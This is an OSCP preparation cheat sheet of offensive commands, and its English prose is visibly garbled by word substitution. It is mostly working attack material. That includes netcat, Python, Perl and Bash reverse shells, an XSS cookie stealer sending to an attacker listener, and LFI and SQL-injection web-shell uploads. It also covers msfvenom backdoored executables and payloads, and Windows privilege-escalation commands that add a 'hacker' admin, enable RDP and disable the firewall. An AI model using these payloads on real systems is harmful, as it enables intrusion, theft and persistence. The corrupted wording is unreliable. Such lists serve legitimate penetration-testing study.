I desire to portion a twosome of things that I intend helped me preparing the Offensive Security Certified Professional - OSCP certification together with what I establish useful during the labs together with exam. If you lot have got whatever questions, experience gratis to contact me.
Don't forget to:
- Follow the courseware offset together with therefore start practicing inwards the labs.
- Use additional sources to larn more.
- Join the offensive safety PWK forums together with social media together with speak to other people.
Tips
Enable service on every reboot:update-rc.d <[SERVICE]> enable
Extract link from html page:cat index.html | grep "href=" | cutting -d "/" -f3| grep "<[DOMAIN]>" | cutting -d '"' -f1 | form -u
Netcat
Interact alongside application:nc -nv <[IP]> <[PORT]>
Listener:nc -nlvp <[PORT]>
File transfer (client):nc -nlvp <[PORT]> > <[FILE]>
File transfer (server):nc -nv <[IP]> <[PORT]> < <[FILE_TO_SEND]>
Bind vs Reverse Shell
Bind Shell:
Bob needs Alice's help. Bob laid a listener on port 4444 alongside -e parameter:
(BOB): nc -nlvp <[PORT]> -e cmd.exe (ALICE): nc -nv <[BOB_IP]> <[PORT]>
Reverse Shell:Alice needs Bob's help. Since Alice is beyond firewall it is impossible to BOB to accomplish Alice. So Alice practise a contrary shell:
(ALICE): nc -nv <[BOB_IP]> <[PORT]> -e /bin/bash (BOB): nc -nlvp <[PORT]>
Zone Transfer
dnsrecon -t axfr -d <[DOMAIN]>
Nmap
nmap -sS -sV -A -O --script="*-vuln-*" --script-args=unsafe=1 <[IP]>
SMB
nbtscan <[SUBNET]> nmap -p139,445 --script smb-enum-users <[SUBNET]> nmap -p139,445 --script=smb-vuln-* --script-args=unsafe=1 <[SUBNET]> enum4linux smbclient -L <[IP]> -N smbclient \\<[IP]>\share -N
SMTP
nmap -p25 <[SUBNET]> --open nc -nv IP 25 VRFY <[USERNAME]>
SNMP
Steps: nmap scan udp 161, practise target IP list, practise community listing file, purpose onesixtyone + snmpwalknmap -sU --open -p161 <[SUBNET]> --open onesixtyone -c community -i <[SMNP_IP_LIST]> snmpwalk -c world -v1 <[IP]> <mib-values>
Mib-values (for snmpwalk):1.3.6.1.2.1.25.1.6.0 System Processes 1.3.6.1.2.1.25.4.2.1.2 Running Programs 1.3.6.1.2.1.25.4.2.1.4 Processes Path 1.3.6.1.2.1.25.2.3.1.4 Storage Units 1.3.6.1.2.1.25.6.3.1.2 Software Name 1.3.6.1.4.1.77.1.2.25 User 1.3.6.1.2.1.6.13.1.3 TCP Local Ports
File Transfer Linux
Netcat:On Victim machine (client): nc -nlvp 4444 > <[FILE]> On Attacker machine (server): nc -nv 10.11.17.9 4444 < <[FILE_TO_SEND]>
Curl:curl -O http://<[IP]>/<[FILE]>
Wget:wget http://<[IP]>/<[FILE]>
Recursive wget ftp download:wget -r ftp://<[USER]>:<[PASSWORD]>@<[DOMAIN]>
File Transfer Windows
TFTP (Installed past times default upwardly to Windows XP together with 2003, In Windows 7, 2008 together with inwards a higher identify needs to endure explicitly added. For this argue tftp non ideal file transfer protocol inwards near situations.)On assaulter machine: mkdir tftp atftpd --deamon --port 69 tftp cp <[FILE]> tftp On victim machine shell: tftp -i <[IP]> GET <[FILE]>
FTP (Windows operating systems comprise a default FTP customer that tin also endure used for file transfer)On assaulter machine:
(UNA TANTUM) Install a ftp server. apt-get install pure-ftpd (UNA TANTUM) Create novel user for PureFTPD (see script setup-ftp.sh) (USER demo, PASS demo1234) groupadd ftgroup useradd -g ftpgroup -d /dev/null -s /etc ftpuser pure-pw useradd present -u ftpuser -d /ftphome pure-pw mkdb cd /etc/pure-ftpd/auth ln -s ../conf/PureDB 60pdb mkdir -p /ftphome chown -R ftpuser:ftpgroup /ftphome /etc/init.d/pure-ftpd restart (UNA TANTUM) chmod 755 setup-ftp.sh
On victim machine shell:echo opened upwardly <[IP]> 21 > ftp.txt echo USER present >> ftp.txt echo ftp >> ftp.txt echo bin >> ftp.txt echo GET nc.exe >> ftp.txt echo goodbye >> ftp.txt ftp -v -n -s:ftp.txt
VBScript (in Windows XP, 2003)On victim machine shell:
echo strUrl = WScript.Arguments.Item(0) > wget.vbs & echo StrFile = WScript.Arguments.Item(1) >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs & echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs & echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs & echo Err.Clear >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs & echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs & echo http.Open "GET", strURL, False >> wget.vbs & echo http.Send >> wget.vbs & echo varByteArray = http.ResponseBody >> wget.vbs & echo Set http = Nothing >> wget.vbs & echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs & echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs & echo strData = "" >> wget.vbs & echo strBuffer = "" >> wget.vbs & echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs & echo ts.Write Chr(255 And Ascb(Midb(varByteArray, lngCounter +1, 1))) >> wget.vbs & echo Next >> wget.vbs & echo ts.Close >> wget.vbs cscript wget.vbs http://<[IP]>/<[FILE]> <[FILE_NAME]>
Powershell (In Windows 7, 2008 together with above)On victim machine shell:
echo $storageDir = $pwd > wget.ps1 echo $webclient = New-Object System.Net.WebClient >> wget.ps1 echo $url = "http://<[IP]>/<[FILE]>" >> wget.ps1 echo $file = "evil.exe" >> wget.ps1 echo $webclient.DownloadFile($url,$file) >> wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Debug.exe utility (In Windows 32bit OS - Works solely for file < 64Kb)On assaulter machine:
cp <[FILE]> . upx -9 <[FILE]> (for compression) cp /usr/share/windows-binaries/exe2bat.exe . vino exe2bat <[FILE]> <[FILE.txt]>
On victim machine:Paste the content of <[FILE.txt]>
XSS
Stole cookie from xss:On assaulter machine laid listener (nc -nlvp <[PORT]>) On victim website <script>new Image().src="http://<[IP]>:<[PORT]>/test.php?output="+document.cookie;</script>
LFI/RFI
Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) together with mail <?php echo shell_exec($_GET['cmd']);?>, afterward that stimulate to include log file for code execution. &cmd=nc -nv <[IP]> <[PORT]> -e cmd.exe&LANG=../../../../../../../xampp/apache/logs/access.log
SQL Injection
Bse:any' or 1=1 boundary 1;--
Number of columns:order past times 1, lodge past times 2, ...
Expose information from database:UNION conduct 1,2,3,4,5,6
Enum tables:UNION conduct 1,2,3,4,table_name,6 FROM information_schema.tables
Shell upload:<[IP]>:<[PORT]>/<[URL]>.php?<[PARAMETER]>=999 marriage ceremony conduct 1,2,"<?php echo shell_exec($_GET['cmd']);?>",4,5,6 into OUTFILE '/var/www/html/evil.php'
Buffer Overflow
/usr/share/metasploit-framework/tools/pattern_create.rb <[LENGTH]> /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -<[ADDRESS]>
Privilege Escalation
Vulnerable Servicesaccesschk.exe -uwcqv "Authenticated Users" * /accepteula sc qc <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> obj= ".\LocalSystem" password= "" sc config <[VULNERABLE_SERVICE]> start= "auto" sc config <[VULNERABLE_SERVICE]> binpath= "net user hacker Hacker123 /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup administrator hacker /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]> sc config <[VULNERABLE_SERVICE]> binpath= "net localgroup \"Remote Desktop Users\" hacker /add" sc halt <[VULNERABLE_SERVICE]> sc start <[VULNERABLE_SERVICE]>
Win10:reg.exe add together "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f Then ctrl+alt+canc together with start virtual keyboard
Pass the hash
Export SMBHASH=<[HASH]> pth-winexe -U administrator% //<[IP]> cmd
Cracking
Medusamedusa -h 10.11.1.227 -U lab-users.txt -P lab-passwords.txt -M ftp | grep "ACCOUNT FOUND"
Ncrack (FTP, SSH, TELNET, HTTP(S), POP3(S), SMB, RDP, VNC)ncrack -U <[USERS_LIST]> -P <[PASSWORDS_LIST]> ftp://<[IP]>
Firewall
Enable Remote Desktop:reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh firewall laid service remotedesktop enable
Enable Remote assistance:reg add together "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f netsh firewall laid service remoteadmin enable
Disable firewall:netsh firewall set opmode disable
One shot ninja combo (New Admin User, Firewall Off + RDP):set CMD "net user hacker Hacker123 /add & internet localgroup administrators hacker /add & internet localgroup \"Remote Desktop Users\" hacker /add & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add together \"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall set opmode disable"
Backdooring EXE Files
msfvenom -a x86 -x <[FILE]> -k -p windows/meterpreter/reverse_tcp lhost=10.11.0.88 lport=443 -e x86/shikata_ga_nai -i three -b "\x00" -f exe -o <[FILE_NAME]>
Binaries payloads
Linux:msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f elf > <[FILE_NAME.elf]>
Windows:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f exe > <[FILE_NAME.exe]>
Macmsfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f macho > <[FILE_NAME.macho]>
Web payloads
PHP:msfvenom -p php/meterpreter_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.php]> truthful cat <[FILE_NAME.php]> | pbcopy && echo '<?php ' | tr -d '\n' > <[FILE_NAME.php]> && pbpaste >> <[FILE_NAME.php]>
ASP:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f asp > <[FILE_NAME.asp]>
JSP:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.jsp]>
WAR:msfvenom -p java/jsp_shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f nation of war > <[FILE_NAME.war]>
Scripting Payloads
Python:msfvenom -p cmd/unix/reverse_python LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.py]>
Bash:msfvenom -p cmd/unix/reverse_bash LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.sh]>
Perlmsfvenom -p cmd/unix/reverse_perl LHOST=<[IP]> LPORT=<[PORT]> -f raw > <[FILE_NAME.pl]>
Shellcode
For all shellcode encounter ‘msfvenom –help-formats’ for information every bit to valid parameters. Msfvenom volition output code that is able to endure cutting together with pasted inwards this linguistic communication for your exploits.Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Windows Based Shellcode:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Mac Based Shellcode:msfvenom -p osx/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -f <[LANGUAGE]>
Staged vs Non-Staged Payloads
Staged payload: (useful for bof) (need multi_handler metasploit inwards lodge to works)Windows/shell/reverse_tcp msfvenom -a x86 -p linux/x86/shell/reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_STAGED]>
Non-staged: (ok alongside netcat listener)Windows/shell_reverse_tcp msfvenom -a x86 -p linux/x86/shell_reverse_tcp LHOST=<[IP]> LPORT=<[PORT]> -b "\x00" -f elf -o <[FILE_NAME_NON_STAGED]>
Handlers
Metasploit handlers tin endure great at chop-chop setting upwardly Metasploit to endure inwards a seat to have your incoming shells. Handlers should endure inwards the next format.use exploit/multi/handler laid PAYLOAD <[PAYLOAD_NAME]> laid LHOST <[IP]> laid LPORT <[PORT]> laid ExitOnSession imitation exploit -j -z
Shell Spawning
Python:python -c 'import pty; pty.spawn("/bin/sh")' python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<[IP]>",<[PORT]>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Bash:echo os.system('/bin/bash') /bin/sh -i exec 5<>/dev/tcp/<[IP]>/<[PORT]> truthful cat <&5 | spell read line; practise $line 2>&5 >&5; done
Perl:perl —e 'exec "/bin/sh";' perl: exec "/bin/sh"; perl -e 'use Socket;$i="<[IP]>";$p=<[PORT]>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Telnet:mknod /tmp/yyy p && /bin/bash 0</tmp/yyy | telnet <[IP]> <[PORT]> 1>/tmp/yyy
Ruby:ruby: exec "/bin/sh"
Lua:lua: os.execute('/bin/sh')
From inside IRB:exec "/bin/sh"
From inside vi::!bash
From inside vi::set shell=/bin/bash:shell
From inside nmap:!sh